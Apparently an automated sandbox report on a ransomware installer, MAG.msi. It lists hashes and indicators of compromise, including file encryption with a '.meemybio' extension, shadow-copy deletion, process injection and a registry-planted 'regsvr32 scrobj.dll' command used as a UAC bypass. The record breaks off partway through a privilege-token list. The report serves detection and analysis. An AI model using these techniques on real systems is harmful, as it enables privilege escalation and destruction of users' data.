Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 05:17
Static task
static1
Behavioral task
behavioral1
Sample
MAG.msi
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
MAG.msi
Resource
win10v2004-20220414-en
General
-
Target
MAG.msi
-
Size
96KB
-
MD5
957d0c81c985609c580565a0323a14cd
-
SHA1
d8d46413409a14a1ae407107016e28074c6824d5
-
SHA256
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
-
SHA512
0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
MsiExec.exedescription ioc process File renamed C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio MsiExec.exe File opened for modification C:\Users\Admin\Pictures\StepOpen.tiff MsiExec.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid process 1312 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid process target process PID 1312 set thread context of 2384 1312 MsiExec.exe sihost.exe PID 1312 set thread context of 2396 1312 MsiExec.exe svchost.exe PID 1312 set thread context of 2492 1312 MsiExec.exe taskhostw.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\107f4e32-2c97-4e9b-93cb-053a08abb1ac.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523071826.pma setup.exe -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\e57bb8f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBDB2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC39F.tmp msiexec.exe File created C:\Windows\Installer\e57bb8f.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA} msiexec.exe File created C:\Windows\Installer\e57bb91.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000005a4eb8c89d443e990000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800005a4eb8c80000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809005a4eb8c8000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2332 vssadmin.exe 1268 vssadmin.exe 964 vssadmin.exe 2140 vssadmin.exe 60 vssadmin.exe 2620 vssadmin.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 18 IoCs
Processes:
msedge.exesihost.exeregsvr32.exeregsvr32.exeregsvr32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exepid process 4532 msiexec.exe 4532 msiexec.exe 1312 MsiExec.exe 1312 MsiExec.exe 8 msedge.exe 8 msedge.exe 1440 msedge.exe 1440 msedge.exe 2768 identity_helper.exe 2768 identity_helper.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid process 1312 MsiExec.exe 1312 MsiExec.exe 1312 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 1440 msedge.exe 1440 msedge.exe 1440 msedge.exe 1440 msedge.exe 1440 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exesrtasks.exedescription pid process Token: SeShutdownPrivilege 5104 msiexec.exe Token: SeIncreaseQuotaPrivilege 5104 msiexec.exe Token: SeSecurityPrivilege 4532 msiexec.exe Token: SeCreateTokenPrivilege 5104 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5104 msiexec.exe Token: SeLockMemoryPrivilege 5104 msiexec.exe Token: SeIncreaseQuotaPrivilege 5104 msiexec.exe Token: SeMachineAccountPrivilege 5104 msiexec.exe Token: SeTcbPrivilege 5104 msiexec.exe Token: SeSecurityPrivilege 5104 msiexec.exe Token: SeTakeOwnershipPrivilege 5104 msiexec.exe Token: SeLoadDriverPrivilege 5104 msiexec.exe Token: SeSystemProfilePrivilege 5104 msiexec.exe Token: SeSystemtimePrivilege 5104 msiexec.exe Token: SeProfSingleProcessPrivilege 5104 msiexec.exe Token: SeIncBasePriorityPrivilege 5104 msiexec.exe Token: SeCreatePagefilePrivilege 5104 msiexec.exe Token: SeCreatePermanentPrivilege 5104 msiexec.exe Token: SeBackupPrivilege 5104 msiexec.exe Token: SeRestorePrivilege 5104 msiexec.exe Token: SeShutdownPrivilege 5104 msiexec.exe Token: SeDebugPrivilege 5104 msiexec.exe Token: SeAuditPrivilege 5104 msiexec.exe Token: SeSystemEnvironmentPrivilege 5104 msiexec.exe Token: SeChangeNotifyPrivilege 5104 msiexec.exe Token: SeRemoteShutdownPrivilege 5104 msiexec.exe Token: SeUndockPrivilege 5104 msiexec.exe Token: SeSyncAgentPrivilege 5104 msiexec.exe Token: SeEnableDelegationPrivilege 5104 msiexec.exe Token: SeManageVolumePrivilege 5104 msiexec.exe Token: SeImpersonatePrivilege 5104 msiexec.exe Token: SeCreateGlobalPrivilege 5104 msiexec.exe Token: SeBackupPrivilege 2392 vssvc.exe Token: SeRestorePrivilege 2392 vssvc.exe Token: SeAuditPrivilege 2392 vssvc.exe Token: SeBackupPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeBackupPrivilege 548 srtasks.exe Token: SeRestorePrivilege 548 srtasks.exe Token: SeSecurityPrivilege 548 srtasks.exe Token: SeTakeOwnershipPrivilege 548 srtasks.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: 